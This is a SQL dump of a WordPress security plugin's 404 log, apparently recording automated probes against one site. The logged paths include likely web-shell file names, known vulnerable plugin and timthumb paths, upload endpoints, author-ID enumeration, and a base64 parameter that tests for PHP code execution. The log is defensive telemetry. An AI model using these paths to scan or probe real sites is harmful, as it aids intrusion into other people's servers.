(0x3fca95e3aa547006fb4847993645a727, 1486985115, '/hello-world/wp-login.php'),
(0x5c82fcd36f4d8f1b2e307e33986c3553, 1487116285, '/wp-content/plugins/placester/js/uploadify/uploadify.css'),
(0xec1eb721a55e59185ac53ea004f96d71, 1487116285, '/wp-content/plugins/nmedia-user-file-uploader/nm_fileuploader_style.css'),
(0x650e7e400b37ec9d23dd52f06f7e5e8b, 1487206751, '/wp-content/plugins/nmedia-user-file-uploader-pro-v5/nm_fileuploader_style.css'),
(0x153c3e3390ae29f56adf63a0e58750e1, 1487290327, '/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php'),
(0x85ee09edc3692f6983fb761f4d2613c6, 1487290331, '/wp-content/plugins/comment-extra-field/readme.txt'),
(0x996e75c8102865e89ea9f5444b93f6d8, 1487319319, '/wp-content/themes/dance-studio/css/jquery-ui.css'),
(0x43e547bda81a71b3abd6a2944379f327, 1487321072, '/Marvins.php'),
(0x0e0973d66e906210c7c5fa43cecc334e, 1487327714, '/wp-content/plugins/stats-wp/readme.txt'),
(0xd8a6df850d00df8e1b63b1ebb2f22324, 1487514262, '/wp-content/uploads/index.php'),
(0x57c3915bdc47385c71ab48aaff0d9926, 1487514287, '/pols.php'),
(0xb8bf930d1a07e0668c8f3f34c4167737, 1487514353, '/wp-admin/includes/rnnvhs.php'),
(0x52aacf84dfd8ff220c56afa3036057f9, 1487514419, '/wp-includes/images/media/rss.php'),
(0xa03a91ccdb805e1f3c0692d9e005044a, 1487514702, '/wp-sbb.php'),
(0xe8f9bcae5f6a9c2cd9314e41216aa6d1, 1487514785, '/wp-admin/includes/wp-cods.php'),
(0x05ca6ab16f97e13e87ec264da6c37ba9, 1487514992, '/upgrade.php'),
(0x791d0ab2596106b36b82f77025a6978a, 1487515062, '/wp-admin/theme-uploader.php'),
(0xc15b535a725c7378198e1d400ea46905, 1487515071, '/wp-admin/plugin-uploader.php'),
(0xcf1fbfc4eac3696e57a6494510692cbe, 1487515081, '/random.php'),
(0xaf09594a8b3b45d23f7d851b7e4118c0, 1487586514, '/wp-content/themes/pro-hosting/wp-search.php'),
(0xb2b9850644486e68ac3ce89b9d0bb4e3, 1487587093, '/plugins/system/anticopy/anticopy.php'),
(0xf476f9edd731274be7832eab76e1f03b, 1487587109, '/mssqli.php'),
(0xf4c5ce17c03f28b5765d79afaaf93c5a, 1487587980, '/modules/mod_ariimageslidersa/mod_ariimageslidersa.php'),
(0x350728f46e06229f9559368f6154ac6e, 1487588311, '/main_.php'),
(0x5038fda0f38aa948d21e8f939ee98f3d, 1487589001, '/wp-content/themes/vmag/wp-search.php'),
(0xd9a366e4a1dde8a0189e91a0131dc3d0, 1487590180, '/wp-content/themes/twentyseventeen/wp-search.php'),
(0xe0ad8ef6331e79608687da4e4b0afa8f, 1487590248, '/wp-content/themes/dshopping/wp-search.php'),
(0x25dace8bbbaf8dc3c2fc2952648871f0, 1487591221, '/alfa.php'),
(0xe72bda044214317d87926ae4c6c06f0b, 1487592997, '/modules/mod_stat/mod_stat.php'),
(0x8aae49654929f1c5d7d3bf58eb71540a, 1487616099, '/wp-content/plugins/pica-photo-gallery/css/style.css'),
(0xd8fb819b85dbc5614e4e84874827345a, 1487616099, '/wp-content/plugins/annonces/admin/theme.php'),
(0x4fa105af8aed7c1a88291dced7d5ef86, 1487671884, '/wp-content/hfilter.php'),
(0x0c653db20ca5a6cc62d419a91facec5b, 1487672063, '/hfilter.php'),
(0x6104487ac5ce82d85393ff7f69bb4876, 1487720339, '/wp-content/plugins/web-tripwire/readme.txt'),
(0x77cbf0f92ff32e8d4e9631451f5f22ff, 1487721918, '/wp-content/plugins/image-symlinks/uploadify/uploadify.css'),
(0xbcc826b180e9cbf068a6591c939e662a, 1487721922, '/wp-content/plugins/videowhisper-video-conference-integration/vc/flash_detect_min.js'),
(0x9a5bd13dc5441aa3ea44e2f670a81bf8, 1487755773, '/wp-content/plugins/cherry-plugin/admin/import-export/wp-xml.php'),
(0xb098b797d1f74e4fae98481126a43753, 1487787987, '/?author=30'),
(0xb0e32b39bad26383513d15ea6edaa212, 1487787988, '/?author=31'),
(0x5e56e4c1ff608dacd9ef2423d8914074, 1487787988, '/?author=32'),
(0xd14e1d4c8529d84b54e6541a70a3f199, 1487787989, '/?author=33'),
(0x611e6b4ff2f3cdf7eda454d3f5a3485a, 1487787989, '/?author=34'),
(0x2d89cdeda16d54ce9780111312e85390, 1487787990, '/?author=35'),
(0x887f535eabf327f02fa4853fac2b0cc1, 1487787990, '/?author=36'),
(0x6b0f0edb11901a72320758dafe911e38, 1487787990, '/?author=37'),
(0x72e5047245a44ba11bb14496cea13c8c, 1487787991, '/?author=38'),
(0xd3f7f6d10897a0ab30e7f9fa6b8c3753, 1487787991, '/?author=39'),
(0x36cf21924a6b7c36cc4f62153e1e05dd, 1487787992, '/?author=40'),
(0x48313ff2538edc3becc555ccb0341339, 1487787992, '/?author=41'),
(0x0db4a3b42339fa125799a25852051ae9, 1487787992, '/?author=42'),
(0x3d761ed433c77b07952e18159f7be5ba, 1487787993, '/?author=43'),
(0xb04d829212c7f938a39b85fb5364e7d2, 1487787993, '/?author=44'),
(0x6e14eefc9419107c65f1a456211fbe7d, 1487787994, '/?author=45'),
(0x73c44d8fa4d7132aa7f28715a9adea0c, 1487787994, '/?author=46'),
(0xa2447f5cfa7640ae53c232a204dd1bc2, 1487787995, '/?author=47'),
(0x327b90efa28355e717d3ecdbf0ed8cd5, 1487787995, '/?author=48'),
(0x4710db1bc29df6e5cad18423b6a4fca9, 1487787995, '/?author=49'),
(0x859352b99b561de86612d207b017170d, 1487909273, '/wp-includes/logo_img.php'),
(0x32c35bbf953bd2db128cfc17c1719f7c, 1487911182, '/wp-content/plugins/sam-pro-free/js/sam.pro.dialog.js'),
(0x93a0cde26fa5af7afb28cffdad200439, 1488187603, '/wp-content/plugins/gallery-slider/readme.txt'),
(0xc30a73e3207c2cbdbeb6225153edd2ef, 1488199640, '/wp-content/logo_img.php'),
(0x36457a0d9fcf094500232e2cd096a400, 1488225888, '/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php'),
(0x654c45dcfa0e81cee6b9201f19e0be90, 1488380493, '/wp-content/uploads/wp-config-sample.php'),
(0x64e419d0f41b8ec2c79c68f84bb7ed8a, 1488392734, '/administrator/'),
(0xac7e07e5708cb7f45562a73d852cf224, 1488424662, '/wp-content/plugins/sexy-contact-form/includes/fileupload/'),
(0xb6f5484e01c7fab7178b25366ed63d68, 1488450232, '/wp-content/uploads/wp-error.php'),
(0xf49c4e9465afb509cf8660d92d1c5924, 1488469706, '/wp-copv/hook-filters.php'),
(0x4889dba6afc899e3703dbc71eb8008af, 1488485764, '/wp-content/uploads/wp-security.php'),
(0xe3a02c2fe6babb6c1bc682c01a4e4231, 1488513022, '/wp-content/plugins/wp-mailinglist/css/colorbox.css'),
(0x9c7dceb9809724759bb0bb375c1b89d1, 1488525813, '/wp-admin/css/uploader.php'),
(0x1e439756383afecb82b6cf22b6a0312b, 1488534953, '/wp-content/plugins/smart-videos/readme.txt'),
(0xd10c6c3d1a4b39d453df9e8726f38e39, 1488538308, '/backups.php?mode=config&key=C6y1F2EA7217PBTL1FlcH98sOpfo/r1Z76/OKFae'),
(0x748f8fd174d78bbe2aab456c145a3264, 1488547213, '/wp-content/plugins/zen-mobile-app-native/readme.txt'),
(0xf2e6dd7bba4bf1ddc6583baf5e570614, 1488582268, '/wp-honor.php'),
(0xfb81ea45cb680e646858560ecf49b38c, 1488582366, '/wp-includes/class.wp-times.php'),
(0x08f49f3b9b75306c31073a935a72aa41, 1488582888, '/wp-admin/network/rnnvhs.php'),
(0xbaf43e6b7f5c5a862e99f02a9c674289, 1488582895, '/wp-content/uploads/rnnvhs.php'),
(0x85b2d361c62726ada6808f1a8ed83e69, 1488582901, '/rnnvhs.php'),
(0x40634c6f450717f0526e1ff7e3583eaf, 1488582908, '/wp-content/plugins/rnnvhs.php'),
(0xa8b5d6312f97856bb0c7ce483af26a98, 1488582912, '/wp-admin/user/fronqx.php'),
(0x7fcbe97ce18ef6e58a2ca8c27faa0ccf, 1488586509, '/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.css'),
(0x7095becabb8f0e3e3b3045a2f28fa013, 1488594745, '/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php'),
(0x9a5ffc36e90f848a6172e628d0d8801c, 1488602468, '/wp-404.php'),
(0x97bb080f65d98d9fc03f2460ca9cb4c2, 1488620427, '/wp-content/plugins/woocommerce-products-filter/readme.txt'),
(0x30d359cee225d16109054447275483c5, 1488686582, '/wp-content/plugins/wp-handy-lightbox/readme.txt'),
(0x65aa109420bfd908eb458e51ac9982c9, 1488785858, '/wp-ver2.php'),
(0x441a2b60625702fe94ecd86caaebf979, 1488850869, '/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/README.md'),
(0x8d32cfdf5a7db8bb0ee1f74521362602, 1488850869, '/wp-content/plugins/image-store/_css/admin.css'),
(0x7e403f3d698a9d205bd45b78ecb9dab2, 1488864212, '/modules/modules/modules.php'),
(0xa24e355ba779220966cdc1fa942ed1d9, 1488880256, '/sample.php?sam=cHJpbnQoJ2ZidnRzYnRyaHJoJyk7'),
(0x4ff7d3d908815508cecd9b192768cdc3, 1488883253, '/wp-check.php?z=cHJpbnQoJ2ZidnRzYnRyaHJoJyk7'),
(0x71b963cdfe157c572175de18baf00a24, 1488886559, '/wp-content/plugins/error-log.php'),
(0x66d9819e16277ae598f2efcacdbb063c, 1488886641, '/wp-includes/error-log.php'),
(0x0f6532f2cf478c3e967bca6c0c399118, 1488886823, '/error-log.php'),
(0x1d95c3888093a7338bbf2dbf21884e3b, 1488894110, '/defautls.php?test=1111'),
(0x9d14ab24c983228a5efa041e6e80c931, 1488894463, '/wp-includes/class.wp-times.php?test=1111'),
(0xb5a772d7a9459a2ebc9fd1c09d7144d2, 1488902178, '/wp-content/plugins/cms-commander-client/index.html'),
(0x94ab41c9267feb30b14856e4301c9d49, 1488981972, '/wp-content/plugins/mailchimp-integration/readme.txt'),
(0xd4079db90206205c1f59c0bc6b6bd030, 1488982133, '/wp-content/plugins/seo-rotator-for-images/readme.txt'),
(0x408303003fbe495478b109cbd39dcab4, 1489076173, '/wp-content/uploads/wysija/themes/wolf/herewgo.php'),
(0xa86885fce9aa48e5a413e975e510cc0a, 1489076174, '/wolf.php'),
(0xe4484824b3d737327764d83e18f4a770, 1489076174, '///?gf_page=upload'),
(0x6950a8876618052cbfb2052ce4fd9f52, 1489088754, '/wp-content/plugins/fluid_forms/file-upload/server/php/'),
(0xd181cd0fe62d64f7a003ccf9e2af6e09, 1489153522, '/wp-content/o4.php'),
(0x744dbb0acebc7f9d505961693931c928, 1489153917, '/wp-content/uploads/db_1.php'),
(0xd03b0be1aad791eecde5142dde40a5b9, 1489155140, '/wp-content/functions-admin.php'),
(0x24927ea01692714fd33eaff54f8bec4a, 1489183882, '/wp-json/wp/v2/users/'),
(0x012fccd8a44da69252f13d7e511c5b47, 1489196662, '/wp-content/plugins/arcadepress/gpl.txt'),
(0xce1e3ce09e0598ecb756a003ad039ca0, 1489253212, '/assets/global/plugins/jquery-file-upload/server/php/'),
(0xc7d3f5f4160e16bbc7b3d1cb9851ec96, 1489327912, '/wp-content/uploads/2013/11/nouvelles-seances-ct.png'),
(0xb8099fe350efed2cf6b2beeadd94a241, 1489344932, '//?gf_page=upload'),
(0x5aca41baccbd3a9b42a34dd792de24af, 1489368717, '/wp-content/plugins/ads-widget/readme.txt'),
(0xa64a44f81cc57765e1df5744bc23e257, 1489398834, '/confg.php'),
(0x63c32b84df63eb509083f2e0d212df89, 1489398836, '/confg.php.suspected'),
(0x31f7ff587f0852e5ca8c47bca65c0f4b, 1489398845, '/htaccess.php'),
(0x02d1117e022a43db121064b923525310, 1489398848, '/htaccess.php.suspected'),
(0x48659ab17ab035fd4de5e17c7df68f01, 1489398850, '/b37.php'),
(0x2ecf33bf3dcd4dd6679f74067f0c984f, 1489398852, '/b37.php.suspected'),
(0xb23184e9d07e9bf909b00b46b8949662, 1489398859, '/xx.php'),
(0x11a20f2279b9b3ccd9ddfe3f2176611c, 1489398863, '/un.php'),
(0xe5066e0549b1b390b93164ff559cdb6b, 1489398865, '/misc/img.php'),
(0x76d2255031da2009d430a3a042312552, 1489398868, '/contact.php'),
(0x2bb90ef93aab0bed4d8a953cfe5218a4, 1489398871, '/contact.php.suspected'),
(0x9feee3f74f2fac59d4b75ebadd3e8275, 1489398876, '/a.php'),
(0x7ddb0a31e4a98a0c6436120585c4b7b3, 1489398878, '/index-WP.php'),
(0x50ff7517cab6b419c894f04df888f0a4, 1489398882, '/index-OLD.php'),
(0x2b59a561c8588caa75885175a690f23f, 1489398889, '/Afras.php'),
(0x92c7b43dbb8468834df781719c2b88c9, 1489398891, '/webinfo.php'),
(0xa5966a2625fc2f2d5977999bb2225d5d, 1489398894, '/joz.php'),
(0x771eb26b79a14a375d826cf6f558dbe9, 1489432704, '/wp-content/themes/gaukingo/db.php'),
(0x27076d353dcb5edebe9a6e8c64aa3f04, 1489434722, '/reade.php'),
(0x343196b39b44c171ded30cd5cac9147d, 1489434883, '/trackback.php'),
(0x3362156c3214d23b3de88958572889d7, 1489435093, '/wp-sonde.php'),
(0x1da1f23ee100e7b2cfff5c0ac22a8131, 1489435307, '/revslider.php'),
(0xf97f9d5bca75e65254b1b66306a5c51c, 1489435686, '/LICENSE.php'),
(0xebd85de10aa5b44883d34788ac437d51, 1489440096, '/wp-content/plugins/downloads-manager/readme.txt'),
(0x2e250ddb83f5e8820092f990ab5877a2, 1489494887, '/wp-content/common.php.suspected'),
(0xcc3a2359d5d8627f31d4d846664cc765, 1489500200, '/wp-content/plugins/wp-popup/readme.txt'),
(0x788dc69b1a0a38d93ce0f20ee09694d1, 1489522107, '/wp-admin/user/user-add.php'),
(0xd025b2186b777c00faa4171e6f2082c8, 1489522107, '/wp-admin/images/logo_img.php'),
(0xc0b33d8ff55bbe6bcb4f0de8b91fe4b2, 1489522107, '/wp-admin/edit-media.php'),
(0x21a0bbc312a8d0394f254cbba0fbb044, 1489522108, '/wp-admin/image-true.php'),
(0x555f057542b144bc4848568ddf2b6fe2, 1489522193, '/wp-content/uploads/2016/02/backup.php'),
(0x2e377288d509ca10abe96bf611367d18, 1489522193, '/wp-content/plugins/contact-form-7/images/update.php'),
(0x4c71046bdd841658ec0b8efc3512fa44, 1489522193, '/wp-includes/Text/logo_img.php'),
(0x784227275f4d24703f2f789fdb17f126, 1489522193, '/wp-content/themes/twentytwelve/system.php'),
(0xcbbb3e3182c8bd970e1c1f9ff6ab54bf, 1489522193, '/wp-includes/pomo/logo_img.php'),
(0xbc6647803ec1a2e68b4b5b51907c186f, 1489522193, '/wp-includes/SimplePie/logo_img.php'),
(0x555b564fadd74ae8b4fb744189d957bb, 1489522214, '/wp-includes/theme-compat/logo_img.php'),
(0xc107c13cf9b0c8ea5ebc4e9fa17f3a87, 1489554151, '/contactys'),
(0x847b2684104095597d8432c814d8639a, 1489643870, '/wp-content/plugins/mobile-app-builder-by-wappress/readme.txt'),
(0x280309f4748263f8fe8e24792f6411ec, 1489646329, '/pomo.php'),
(0xeb4237e1eb72752399c2e464cae5c94b, 1489646368, '/locoy.php'),
(0xd8e149cf94c6d34c48f2c52a9e432640, 1489646495, '/AKaWn7.php'),
(0x6c0251fd37ab8efa3a5db44ebbaf2e13, 1489646778, '/extracts.php'),
(0x690ec7731509c70a8c159e949ed76f05, 1489646888, '/configurationbak.php'),
(0x90be9eb1943ab3e1cb7566e839ab356c, 1489646976, '/wp-code.php'),
(0x07af3d9e443407a4ce59a4ee3aab3fcb, 1489647074, '/wp-cods.php'),
(0x606673b8d594d392549215e0c5dd8394, 1489647275, '/indes.php'),
(0x4daff0615ac20d98a9b6eade8989fbf8, 1489647427, '/wp-tmp.php'),
(0x7213b66d3d809c182d705d1704b2485e, 1489647530, '/4Rc43a.php'),
(0x2ee41b7ac447aad22ec390b27f67da79, 1489647728, '/apache_pd2.php'),
(0xe40259f0bd1e9e5ccbb1c332dbf09c00, 1489647786, '/wp-upgrade.php'),
(0xe15c0c3847664321fe87f58b2b50f24e, 1489710910, '/wp-content/plugins/gravityforms/css/admin.css'),
(0x27524048c282ec08d01870251bbf5968, 1489793895, '/wp-content/plugins/php-event-calendar/css/uploadify.css'),
(0x22f1ae86cd9300cdbd67995c5cbb44a4, 1489793899, '/wp-content/plugins/php-event-calendar/readme.txt'),
(0xde1ced4a85b1299d59a6880804288e89, 1489818821, '/language/en-GB/language/en-GB/en-GB.xml'),
(0x5e953706fa7dc563749586cb81035e3a, 1489936170, '/wp-content/plugins/wp-editor/readme.txt'),
(0x6c762931f3b62c61bfddba4b6561f13a, 1489936171, '/wp-content/plugins/zingiri-web-shop/admin.css'),
(0x8d1307ba1412feadf93d651d1e547cd8, 1489936172, '/wp-content/plugins/auto-attachments/a-a.css'),
(0x2f4155b8afef250dfea0ea91f3939a6a, 1489936172, '/wp-content/plugins/front-end-upload/destination.php'),
(0x7a86128caa8d7923e8e379dc453e1577, 1489936172, '/wp-content/plugins/fcchat/default.png'),
(0x22c8d2c2c052cd644fdfcc9684f34444, 1489936172, '/wp-content/plugins/mac-dock-gallery/bugslist.txt'),
(0x9c3bcbe0984f6cd9d87cbd5c71bc069a, 1489936173, '/wp-content/plugins/resume-submissions-job-postings/installer.php'),
(0x7d980bbb2845ee269784c8f71a771450, 1489936174, '/wp-content/plugins/user-meta/readme.txt'),
(0xe04ef9dfff312bc90708a7d264da1500, 1489936174, '/wp-content/plugins/font-uploader/font-uploader-free.php'),
(0x2b45f66437e20d234bab3b9665b024a7, 1489936175, '/wp-content/plugins/wp-homepage-slideshow/functions.php'),
(0xb563fb5e35b82305d2db4d4744ad391e, 1489936175, '/wp-content/plugins/user-photo/admin.css'),
(0xec29c10017e5afc8d44d4d2e2e09dc3e, 1489936175, '/wp-content/plugins/wp-property/action_hooks.php'),
(0xcc1d76c9c8438fd831a15ae3b9754672, 1489936176, '/wp-content/plugins/custom-content-type-manager/index.html'),
(0xe2e1f270678dfcd3155900addd974267, 1489936176, '/wp-content/plugins/wpstorecart/lgpl.txt'),
(0x6ad10c167dc256cf34663fd7ee5b8194, 1489936177, '/wp-content/plugins/nmedia-user-file-uploader/readme.txt'),
(0x332d30c3d80e4c6916db5e22a28bed1b, 1489936177, '/wp-content/plugins/simple-dropbox-upload-form/'),
(0xf9f3b17015c8f13da420534b39eb6dd2, 1489936177, '/wp-content/plugins/wp-image-news-slider/functions.php'),
(0x5f915841ed0ee106e673e676882c1960, 1489936178, '/wp-content/plugins/wp-filemanager/fm.php'),
(0x7e35863d20dc76321006a7055301be97, 1489936178, '/wp-content/plugins/ckeditor-for-wordpress/ckeditor.config.js'),
(0x529ac9c8715ef85610fc4e9e08d23556, 1489936178, '/wp-content/plugins/another-wordpress-classifieds-plugin/AWPCP.po'),
(0xec6ecbc4c5888c81158fbffe08abacb9, 1489936179, '/wp-content/plugins/gallery-plugin/gallery-plugin.php'),
(0xd1f4bbff45f56f935005f1cf54af0001, 1489936179, '/wp-content/plugins/cimy-user-extra-fields/README_OFFICIAL.txt'),
(0x7a3353cf70fd762186b697b6686552bd, 1489936179, '/wp-content/plugins/ninja-forms/ninja_forms.php'),
(0xc087d0b0bfab9923fc61d252e03d28b6, 1489936179, '/wp-content/plugins/wp-e-commerce/license.txt'),
(0x11d7c546c5fb8a51642f36cc12469139, 1489936181, '/wp-content/plugins/magic-fields/MF_Constant.php'),
(0x4673f19efdb557e01800672672ec887d, 1489936181, '/wp-content/plugins/nextgen-gallery/changelog.txt'),
(0x545f2d59275c010aae10c778645b1107, 1489936182, '/wp-content/plugins/user-avatar/readme.txt'),
(0x29c502984819af49ae9652772651a49b, 1489936643, '/wp-content/plugins/category-grid-view-gallery/cat_grid.php'),
(0x9331c6c2303d4ab0722f20602de197cb, 1489939903, '/wp-content/plugins/wp2android-turn-wp-site-into-android-app/readme.txt'),
(0x0fda3f5d337483433062c20038fe02cb, 1489951831, '/contactsf9'),
(0x3b7b451e5a6d226b8e5d623d8912b131, 1490013531, '/wp-conf.php'),
(0xeacf4a0a5b9a8817337300c213b2d263, 1490052348, '/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/'),
(0x78335ffeb12ce016b1da78aba262a8d6, 1490056124, '/wp-content/themes/headway-16/style.css'),
(0xf8d4747f0a4025640853c988594e2d94, 1490108441, '/wp-content/logo_img.php.suspected'),
(0x237886752f427b871ccd9879fbaa0949, 1490142467, '/wp-content/plugins/simple-ads-manager/css/jslider.round.plastic.css'),
(0x8b48c6c3477e0249bf04a970191e09bf, 1490196571, '/wp-admin/logo_img.php.suspected'),
(0x559b9f4829e51ba3a67f72725f847c4e, 1490245253, '/default.php'),
(0x2d952d75f54a8b07c616da5d8ce789c2, 1490245257, '/wp-content/plugins/revslider/css/tipsy.css'),
(0xc73bd256ad99bf503caab6dd2443b3c6, 1490278975, '/wp-includes/logo_img.php.suspected'),
(0xbe4fc7f11ffe73c19e648ae25b72e5a1, 1490377863, '/sites/all/themes/hatch/templates/search.php'),
(0xb5ec1a0b06e39ec97f79c166b0ab7ad3, 1490379002, '/system/logs/include20.php'),
(0x2957bfc5b0854d45facf24eb126a1649, 1490379096, '/admin/language/english/total/search.php'),
(0x7d87b5118e13d84ef0e26e81cf0fba5f, 1490384829, '/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/index.css'),
(0x27a74125d2ee62711619d82e104ffb5d, 1490384832, '/wp-content/uploads/2015/09/new_up.php'),
(0x79c4b117ac096c4de3ae7a999d273294, 1490398183, '/wp-content/uploads/wpcf7_captcha/1625059663.png'),
(0xc8da6ff1a20755b08ff0d9387f126a7c, 1490459760, '/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/readme.txt'),
(0x67318653d9fae599ff3756dff7557c08, 1490501299, '/wp-content/uploads/2015/10/new_up.php'),
(0x5e1e72ee1519fc1946f5143cb6021de2, 1490575146, '/wp-content/plugins/buddypress-media/readme.txt'),
(0x98d08b7386e8b9b0a69c5e63e5ebf0a6, 1490669271, '/wp-content/plugins/revslider/images/tipsy.gif'),
(0x3f4c3b438a92a010a2e0dd917d010cb2, 1490669273, '/media/mass.php'),
(0x21ce8e4b16bedfe1225fa4982b8cb8f4, 1490691497, '/wp-content/uploads/2015/11/new_up.php'),
(0xc462f2856134e8912553755038555400, 1490691497, '/wp-content/uploads/2015/12/new_up.php'),
(0xfe80f613cdd588f09f2e3e809159e77f, 1490755262, '/wp-content/plugins/analytic/readme.txt'),
(0xf895b7f9c041cf1e811f96968733f9e4, 1490761924, '/wp-copv/css.php'),
(0x4f06f88139539cf1a3af0254ebaadfae, 1490772894, '/wp-admin/includes/images.php?x=1'),
(0x182e5298d2d3084bd8ed711967bc5962, 1490788354, '/wp-includes/Text/Tiff.php?x=1'),
(0xa4926c45222b36f20f4f8f6f9bde7d7f, 1490810324, '/wp-kidmx.php?script=1'),
(0xbf3260013a5839aece3b8935ae7b09d3, 1490827747, '/wp-print.php?script=1'),
(0x8dcdcc14daa0236c0f842591a998f754, 1490834657, '/wp-content/uploads/2015/08/new_up.php'),
(0x7f4791832e3614e71acc4af39dffadda, 1490834659, '/wp-content/uploads/2015/07/new_up.php'),
(0xa3ee897f696a17106abe39c7376d216d, 1490845456, '/missok.php?x=1'),
(0x22a5a013d01a43eb110ed75cadbd606b, 1490887057, '/wp-includes/pomo/so.php?x=1'),
(0xfcdc9157f5965b3a07b44dbcf5319830, 1490888204, '/wp-content/plugins/analytics-counter/class.wpadm-ga.php'),
(0x5272c17798f7e33c07064d3a5038357d, 1490909243, '/wp-includse.php?script=1'),
(0x0ffa6bc7bf9c082a16a796ad3ad72d01, 1490926421, '/Martina.php'),
(0xdbcf5a77e9e7e91cfb713130fc1f3d34, 1490928120, '/component/users/?view=login'),
(0x62cef20926cce88ddb954da8820dca0e, 1490940349, '/wp-content/uploads/2015/06/new_up.php'),
(0xe6cc4009b190365f0c04cd014c39150c, 1490943767, '/db_z.php');
INSERT INTO `www2_wfNet404s` (`sig`, `ctime`, `URI`) VALUES
(0x0d9b8331c83e4e5faf1371eb481e4eb9, 1490961555, '/kup.php?u=1'),
(0x674a085cfe36ffdf6b1091fd15f6ae85, 1490979097, '/Tobey.php'),
(0xe9d1b03d2627635e58b27422b99feb38, 1490994895, '/cachee.php'),
(0xbdf4a7c1edd5b3626fd8d41644dcde14, 1491010868, '/wp-profi1e.php?x=1'),
(0xe6c216cb6c91df9ecddd884ce191d628, 1491015627, '/wp-includes/wp-inc.php'),
(0xc8c14930a0461c6fe6940389edc7e3da, 1491042937, '/license.php?x=1'),
(0xbe53dc78965b90219d3bdc77fd627bb4, 1491052746, '/wp-includes/images/hon2our.php'),
(0xeaa71f9350ce8c8dfca8423eb1c2d58f, 1491092287, '/wp-content/uploads/2016/01/new_up.php'),
(0x70cd38b6c42da899dea152ba42fe8e85, 1491092287, '/wp-content/uploads/2016/02/new_up.php'),
(0x63223907e0dfaf3febf99e89d00ac316, 1491273398, '/yt.php'),
(0xc0bf28acf41fd07561a425a996dc519e, 1491304279, '/inedx.php'),
(0xd8caf03914e841e1257e52f29cb03739, 1491345959, '/wp-conet.php'),
(0x625830d1d89bd72ca4a5dfaf58b7b9f3, 1491423791, '/wp-content/themes/theagency/includes/uploadify/uploadify.php'),
(0x71cc8ab2947703e5c15b3cf064060e7a, 1491478482, '/log.php'),
(0xf607bc69819739672adc9c387eb221d5, 1491481337, '/wp-content/plugins/dropbox-backup/template/js/admin-wpadm.js'),
(0x0dc14974e3f286878c783909fc5e34ec, 1491541106, '/wp-admin/admin-center.php'),
(0xa116a8a9336b50c1359765265eba690b, 1491555141, '/wp-includes/xmlparser.php'),
(0x9d28cc027a5196966316154926a513de, 1491555141, '/akism.php'),
(0xf11fc530d14db31c59d46d96b755ab3c, 1491859741, '/version.php'),
(0xf1e73fe98c020b1333a617ce4df52643, 1491859755, '/admin/language/english/total/arhive.php'),
(0x5ffd0df2039a4ce321f4f1e5a77cd745, 1491859962, '/cmsbuild.php'),
(0x99ad528b9817658a05e35864c71e05ff, 1491860469, '/media/version.php'),
(0xbe8d2c155b968104fc082ba624be9cd7, 1491860548, '/wp-api.php'),
(0xeb15089c7f0bc4da79ba3efade7910c6, 1491860962, '/wp-content/uploads/cmsbuild.php'),
(0xbfb9034daf632bf572d27cd02183e2b7, 1491861124, '/mod_ariimageslidersa.php'),
(0x4f11ab347d61d4c7a9d2b2999452c7e5, 1491861402, '/assets/images/version.php'),
(0xeab84d49868512c401ae77c6217f999a, 1492293799, '/wp-green.php'),
(0xb2ce75883b838b7d6ff467e69380aae9, 1492566349, '/wp-content/themes/brochure-melbourne/includes/timthumb.php'),
(0x5b6b548905081df7e3f8153d7478afbf, 1492566349, '/wp-content/plugins/wp-mobile-detector/timthumb.php'),
(0x5573011d8ae7cc5e5b6a758495d448c6, 1492566349, '/wp-content/themes/diamond-ray/thumb.php'),
(0xa65406d5951e77c75ff818b0cf6c0ff1, 1492566349, '/wp-content/themes/make-money-online-theme-3/scripts/timthumb.php'),
(0x09c13c1f65231716047cbb5c7182eb72, 1492566350, '/wp-content/themes/Transcript/timthumb.php'),
(0xe5398189babf59e4c35364f95b31d3a6, 1492566350, '/wp-content/themes/pearlie/scripts/timthumb.php'),
(0x7d1408aae5d0117150dbc2006389c04c, 1492566350, '/wp-content/themes/delight/scripts/timthumb.php'),
(0xe33f5bb411c827ef6132a019bf2c1fc8, 1492566350, '/wp-content/themes/thrillingtheme/thumb.php'),
(0xe0e48edd436877c81b9f68335348fd9b, 1492566350, '/wp-content/plugins/a-gallery/timthumb.php'),
(0x9bda83df6a6b2a17e4710faa20c0c753, 1492566350, '/wp-content/themes/optimize/thumb.php'),
(0x8c49f114efce8c59b4343948fb29165a, 1492566350, '/wp-content/themes/dandelion_v2.6.4/functions/timthumb.php'),
(0x109a9303692c2a576db39a25593d4270, 1492566351, '/wp-content/themes/mymag/timthumb.php'),
(0x361e79b79b07492a833ec68af8cc91a5, 1492566351, '/wp-content/themes/swift/includes/timthumb.php'),
(0x6863da2e27b471b2472a05c26e01cc50, 1492566351, '/wp-content/themes/suffusion/timthumb.php'),
(0x27d80837a0b6fdabaf096fbfc5c27e15, 1492566351, '/wp-content/themes/DeepBlue/timthumb.php'),
(0xcf461264dd6807eb8285f11553f386fe, 1492566351, '/wp-content/themes/DelicateNews/timthumb.php'),
(0x94444075449b6ef4697bc73ca5a7411e, 1492566351, '/wp-content/themes/ElegantEstate/timthumb.php'),
(0x5bcef8c15c42c8f4b2d2b9d83b4a10f6, 1492566351, '/wp-content/themes/myjourney_3.1/thumb.php'),
(0xd36662d6b410ae8588928a1d11bd5936, 1492566351, '/wp-content/themes/redlight/includes/timthumb.php'),
(0x32710ae152d317e4d3d4a05ad491885f, 1492566352, '/wp-content/themes/gunungkidul/thumb.php'),
(0xb40afffe0ec4b042bec8adf6bced784d, 1492566352, '/wp-content/themes/neofresh/timthumb.php'),
(0xaed95fd4ab363f6fcc17db620c1894b4, 1492566352, '/wp-content/plugins/seo-image-galleries/timthumb.php'),
(0xce7d9ec6b1c8725e0e2eb4a348fe7906, 1492566352, '/wp-content/plugins/sugar-slider/timthumb.php'),
(0x875b90ef9240448bcd6285b2aa7712ac, 1492566352, '/wp-content/themes/cruz/scripts/timthumb.php'),
(0xd1f4f5a6b23e70ec67e5074b0ec08d51, 1492566352, '/wp-content/themes/typebased/thumb.php'),
